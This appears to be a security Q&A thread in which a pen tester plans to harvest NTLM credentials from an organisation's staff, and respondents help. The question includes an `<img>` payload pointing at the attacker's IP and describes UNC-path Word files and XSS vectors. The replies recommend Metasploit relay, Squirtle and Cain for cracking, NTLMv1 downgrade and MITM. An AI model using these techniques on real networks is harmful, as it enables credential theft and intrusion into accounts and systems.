# Using a Web Server to steal NTLM credentials

Tags: web-application, network, windows, web-browser

I am trying to design an attack vector against an organization in which the pen tester (myself), steals NTLM credentials through HTTP. I am thinking of these scenarios:

1- I set up a web server on my machine and social-engineer the users to visit it.

2- I send an email with an embedded `<img src="my.ip.address/x.gif"/>` so that Outlook sends the NTLM credentials automatically.

3- I use XSS on a local website of theirs to get the NTLM credentials.

4- UNC path to my IP address in a Word file.

I would like to get help and opinions in the following matters:

- Do you know of any tool that helps automate some parts here?
- Will linking to users by IP address actually force them to use their NTLM credentials, not Kerberos?
- Can I pull this attack on non-IE?
- Does it have to be a Trusted Zone in IE? Will my IP address (local in their network range, not external) be considered a Trusted Zone/part of the domain in IE?
- How can I get it in XSS? What kind of XSS code can help here?
- Will Outlook Word document preview execute my UNC trick correctly or do they have to download and run it?

Thank you very much.

Answer (score 1, accepted):

- Tool of choice: Metasploit ([UNC-Path into Docx](http://jedicorp.com/security/exploit-dev/stealing-netntlm-credentials-by-injecting-unc-path-into-docx/) , [Metasploit generic NTLM relay](http://webstersprodigy.net/2012/07/22/metasploit-generic-ntlm-relay-module/))
- Kerberos: Is not a problem, since it have to be implemented on your(!) server otherwise the victim will send you NTLM / NTLMv2 (maybe you are able to downgrade to v1)
- IE Trusted Zone: Normally the local subnet have an own security zone, which is normally pretty low
- Outlook preview (see UNC-Path into Docx)

*Nice attack setup btw ;-)*

Comment: Thank you ;)

What about XSS?

Can you please elaborate on the ability to downgrade users to NTLMv1 (Or even LM?!)

Comment: If someone looks at your mail, they will get a preview via SMB, there is no need to exploit via embedded picture... Basically your server controls the authentification type (NTLM / NTLMv2) but in some systems downgrade is not allowed. Have a look at a few tools: https://code.google.com/p/squirtle/ http://www.oxid.it/cain.html they will do all the work (with cain even cracking ;-) )

Comment: But... Since you are sitting in their local net, why not simply MITM - there is no need to spread mails ;-) It's quite enough to use some MITM tools and wait for the domain admin's NTLM...

Comment: They complained because of the performance degradation! And they use encryption, too.

Comment: Ok... seems legit ;-)